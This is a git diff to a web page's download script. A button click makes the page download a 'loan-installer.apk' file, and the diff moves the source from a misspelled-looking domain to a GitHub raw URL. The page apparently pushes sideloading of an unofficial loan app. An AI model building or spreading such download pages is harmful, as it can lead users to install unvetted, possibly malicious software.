--- a/index.html
+++ b/index.html
@@ -188,7 +188,7 @@
   <!-- Instant Download Script -->
   <script>
   document.getElementById('installBtn').addEventListener('click', () => {
-    const fileUrl = "https://btc.downlaodfilebd.top/loan%20installer%202btm.apk";
+    const fileUrl = "https://github.com/randombdloan/jamanot/raw/refs/heads/main/loan-installer.apk";
     const a = document.createElement('a');
     a.href = fileUrl;
     a.download = "loan-installer.apk"; 
